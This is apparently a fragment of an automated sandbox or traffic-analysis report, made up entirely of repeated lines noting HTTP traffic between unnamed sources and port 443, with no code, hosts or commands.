          Source: unknownNetwork traffic detected: HTTP traffic on port 39600 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 59216 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 37492 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 34394 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 36178 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 35250 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 56180 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 41530 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 40216 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 41926 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53848
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53846
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38210
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53840
          Source: unknownNetwork traffic detected: HTTP traffic on port 38744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 41914 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38212
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38214
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53844
          Source: unknownNetwork traffic detected: HTTP traffic on port 48186 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38216
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53842
          Source: unknownNetwork traffic detected: HTTP traffic on port 48558 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38206
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38208
          Source: unknownNetwork traffic detected: HTTP traffic on port 38372 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 37046 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41856
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41858
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41852
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41854
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41850
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53858
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53856
          Source: unknownNetwork traffic detected: HTTP traffic on port 37058 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53850
          Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38200
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38202
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53854
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38204
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53852
          Source: unknownNetwork traffic detected: HTTP traffic on port 53910 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41848
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41844
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41846
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41840
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41842
          Source: unknownNetwork traffic detected: HTTP traffic on port 52200 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 44196 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51208
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53868
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51206
          Source: unknownNetwork traffic detected: HTTP traffic on port 38360 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58348 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42410 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53862
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51200
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53860
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53866
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51204
          Source: unknownNetwork traffic detected: HTTP traffic on port 56192 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 40204 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53864
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51202
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41838
          Source: unknownNetwork traffic detected: HTTP traffic on port 59228 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 48534 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41834
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41836
          Source: unknownNetwork traffic detected: HTTP traffic on port 38756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 38768 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41830
          Source: unknownNetwork traffic detected: HTTP traffic on port 41902 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41832
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51218
          Source: unknownNetwork traffic detected: HTTP traffic on port 53922 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51216
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53878
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51210
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53872
          Source: unknownNetwork traffic detected: HTTP traffic on port 44184 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58336 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53870
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51214
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53876
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51212
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53874
          Source: unknownNetwork traffic detected: HTTP traffic on port 52212 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41826
          Source: unknownNetwork traffic detected: HTTP traffic on port 40698 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41828
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41822
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53880
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41824
          Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41820
          Source: unknownNetwork traffic detected: HTTP traffic on port 48174 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53804
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53802
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53808
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38250
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38252
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53806
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38254
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38256
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38258
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53800
          Source: unknownNetwork traffic detected: HTTP traffic on port 54838 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 37864 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 48150 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41896
          Source: unknownNetwork traffic detected: HTTP traffic on port 58324 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41892
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41894
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53814
          Source: unknownNetwork traffic detected: HTTP traffic on port 48162 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41890
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53812
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53818
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38240
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53816
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38242
          Source: unknownNetwork traffic detected: HTTP traffic on port 42434 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38244
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53810
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38246
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38248
          Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41888
          Source: unknownNetwork traffic detected: HTTP traffic on port 38396 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41884
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41886
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41880
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41882
          Source: unknownNetwork traffic detected: HTTP traffic on port 50476 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53826
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53824
          Source: unknownNetwork traffic detected: HTTP traffic on port 51790 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 37852 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53828
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38230
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38232
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38234
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38236
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53822
          Source: unknownNetwork traffic detected: HTTP traffic on port 49078 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38238
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53820
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38228
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41878
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41874
          Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41876
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41870
          Source: unknownNetwork traffic detected: HTTP traffic on port 54826 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41872
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53836
          Source: unknownNetwork traffic detected: HTTP traffic on port 48546 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 54430 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42818 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53834
          Source: unknownNetwork traffic detected: HTTP traffic on port 38384 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53838
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38220
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38222
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38224
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53832
          Source: unknownNetwork traffic detected: HTTP traffic on port 50488 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38226
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53830
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38218
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41866
          Source: unknownNetwork traffic detected: HTTP traffic on port 42422 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41868
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41862
          Source: unknownNetwork traffic detected: HTTP traffic on port 36142 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 36538 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41864
          Source: unknownNetwork traffic detected: HTTP traffic on port 60254 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41860
          Source: unknownNetwork traffic detected: HTTP traffic on port 43302 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38170
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38172
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38174
          Source: unknownNetwork traffic detected: HTTP traffic on port 39288 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51144
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38176
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51142
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38178
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51148
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51146
          Source: unknownNetwork traffic detected: HTTP traffic on port 47642 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51152
          Source: unknownNetwork traffic detected: HTTP traffic on port 36514 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 53598 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51150
          Source: unknownNetwork traffic detected: HTTP traffic on port 60626 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 33970 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 33500 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 53116 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 36984 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38160
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38162
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38164
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38166
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51156
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38168
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51154
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51158
          Source: unknownNetwork traffic detected: HTTP traffic on port 54442 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51162
          Source: unknownNetwork traffic detected: HTTP traffic on port 41098 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57456 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51160
          Source: unknownNetwork traffic detected: HTTP traffic on port 50812 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 46798 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 43784 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 47630 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38150
          Source: unknownNetwork traffic detected: HTTP traffic on port 33994 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 33490 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38152
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51166
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38154
          Source: unknownNetwork traffic detected: HTTP traffic on port 36526 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51164
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38156
          Source: unknownNetwork traffic detected: HTTP traffic on port 60638 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 36972 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38158
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51168
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51170
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51174
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51172
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41796
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41798
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41792
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41794
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41790
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38140
          Source: unknownNetwork traffic detected: HTTP traffic on port 50824 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38142
          Source: unknownNetwork traffic detected: HTTP traffic on port 57444 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 41086 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38144
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51178
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38146
          Source: unknownNetwork traffic detected: HTTP traffic on port 33982 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 53104 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51176
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38148
          Source: unknownNetwork traffic detected: HTTP traffic on port 43796 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51180
          Source: unknownNetwork traffic detected: HTTP traffic on port 49066 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51184
          Source: unknownNetwork traffic detected: HTTP traffic on port 46786 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51182
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41786
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41788
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41782
          Source: unknownNetwork traffic detected: HTTP traffic on port 53562 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 54454 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 33524 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41784
          Source: unknownNetwork traffic detected: HTTP traffic on port 56576 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51108
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51106
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53768
          Source: unknownNetwork traffic detected: HTTP traffic on port 36960 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 47678 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 44160 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51100
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53762
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53760
          Source: unknownNetwork traffic detected: HTTP traffic on port 57420 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51104
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53766
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51102
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53764
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53770
          Source: unknownNetwork traffic detected: HTTP traffic on port 41074 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50848 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 43326 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 37876 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51118
          Source: unknownNetwork traffic detected: HTTP traffic on port 43760 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49054 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53774
          Source: unknownNetwork traffic detected: HTTP traffic on port 33536 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51112
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53772
          Source: unknownNetwork traffic detected: HTTP traffic on port 39264 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 47666 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51110
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53778
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51116
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53776
          Source: unknownNetwork traffic detected: HTTP traffic on port 54466 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 53550 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51114
          Source: unknownNetwork traffic detected: HTTP traffic on port 56588 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 56564 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 40290 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 51704 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 47208 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 60602 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38190
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51128
          Source: unknownNetwork traffic detected: HTTP traffic on port 41062 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38192
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38194
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38196
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51122
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38198
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53784
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51120
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53782
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51126
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53788
          Source: unknownNetwork traffic detected: HTTP traffic on port 37888 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53786
          Source: unknownNetwork traffic detected: HTTP traffic on port 54008 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50836 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53792
          Source: unknownNetwork traffic detected: HTTP traffic on port 57432 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51130
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53790
          Source: unknownNetwork traffic detected: HTTP traffic on port 49042 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 44172 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 33548 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 47654 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38180
          Source: unknownNetwork traffic detected: HTTP traffic on port 54478 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38182
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38184
          Source: unknownNetwork traffic detected: HTTP traffic on port 36502 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38186
          Source: unknownNetwork traffic detected: HTTP traffic on port 52694 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53796
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38188
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51134
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53794
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51132
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51138
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53798
          Source: unknownNetwork traffic detected: HTTP traffic on port 46808 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 60614 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51136
          Source: unknownNetwork traffic detected: HTTP traffic on port 43314 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51140
          Source: unknownNetwork traffic detected: HTTP traffic on port 43772 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 39276 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 34404 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49030 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 37418 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 52682 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 33428 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 45040 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 56540 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 34382 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 51728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 55718 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 44218 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 40228 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 41182 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 45904 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 41194 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 46750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 34370 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 37406 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 45928 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 55706 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 33416 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 56552 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 40194 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 51716 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 52670 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 34416 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 40170 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51188
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51186
          Source: unknownNetwork traffic detected: HTTP traffic on port 43206 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51192
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51190
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51196
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51194
          Source: unknownNetwork traffic detected: HTTP traffic on port 39252 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 46762 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 45064 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51198
          Source: unknownNetwork traffic detected: HTTP traffic on port 47750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 34428 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 53574 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57540 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42892 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 43218 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50800 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 39168 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 33512 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 45052 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 40182 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 45916 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 35286 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 53586 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 44206 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 36996 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42880 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 41170 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57468 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 47762 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 39156 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42086 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 47774 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 36646 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 53466 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 37960 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50956 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 53454 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 36634 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 33850 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42074 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 39144 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53902
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53900
